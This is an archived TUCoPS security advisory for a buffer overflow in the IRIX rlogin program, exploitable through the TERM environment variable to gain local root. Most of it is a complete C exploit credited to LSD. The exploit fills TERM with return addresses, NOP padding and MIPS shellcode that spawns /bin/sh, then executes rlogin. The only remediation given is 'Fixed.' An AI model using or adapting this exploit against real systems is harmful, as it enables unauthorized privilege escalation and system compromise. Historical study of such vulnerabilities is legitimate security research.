TUCoPS :: SGI :: rlogin~1.txt

Irix rlogin overflow vulnerability 

COMMAND

    rlogin

SYSTEMS AFFECTED

    IRIX 5.2, 5.3, 6.2, 6.3

PROBLEM

    There exists a buffer overflow vulnerability in the rlogin program
    in  the  way  the  TERM  environment  variable  is handled.  It is
    possible  to  exploit  this  bug   and  locally  gain  root   user
    privileges.  This has been found by LSD.

    /*## copyright LAST STAGE OF DELIRIUM oct 1997 poland        *://lsd-pl.net/ #*/
    /*## /usr/bsd/rlogin                                                         #*/

    #define NOPNUM 4940
    #define ADRNUM 5000
    #define ALLIGN 2

    char shellcode[]=
        "\x04\x10\xff\xff"    /* bltzal  $zero,<shellcode>    */
        "\x24\x02\x03\xf3"    /* li      $v0,1011             */
        "\x23\xff\x01\x14"    /* addi    $ra,$ra,276          */
        "\x23\xe4\xff\x08"    /* addi    $a0,$ra,-248         */
        "\x23\xe5\xff\x10"    /* addi    $a1,$ra,-240         */
        "\xaf\xe4\xff\x10"    /* sw      $a0,-240($ra)        */
        "\xaf\xe0\xff\x14"    /* sw      $zero,-236($ra)      */
        "\xa3\xe0\xff\x0f"    /* sb      $zero,-241($ra)      */
        "\x03\xff\xff\xcc"    /* syscall                      */
        "/bin/sh"
    ;

    char jump[]=
        "\x03\xa0\x10\x25"    /* move    $v0,$sp              */
        "\x03\xe0\x00\x08"    /* jr      $ra                  */
    ;

    char nop[]="\x24\x0f\x12\x34";

    main(int argc,char **argv){
        char buffer[10000],adr[4],*b,*envp[2];
        int i;

        printf("copyright LAST STAGE OF DELIRIUM oct 1997 poland  //lsd-pl.net/\n");
        printf("/usr/bsd/rlogin for irix 5.2 5.3 6.2 6.3 IP:17,19,20,21,22,32\n\n");

        *((unsigned long*)adr)=(*(unsigned long(*)())jump)()+10288+7000;

        envp[0]=buffer;
        envp[1]=0;

        b=buffer;
        sprintf(b,"TERM=");
        b+=5;
        for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
        for(i=0;i<ALLIGN;i++) *b++=0xff;
        for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
        for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
        *b=0;

        execle("/usr/bsd/rlogin","rlogin","localhost",0,envp);
    }

SOLUTION

    Fixed.

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH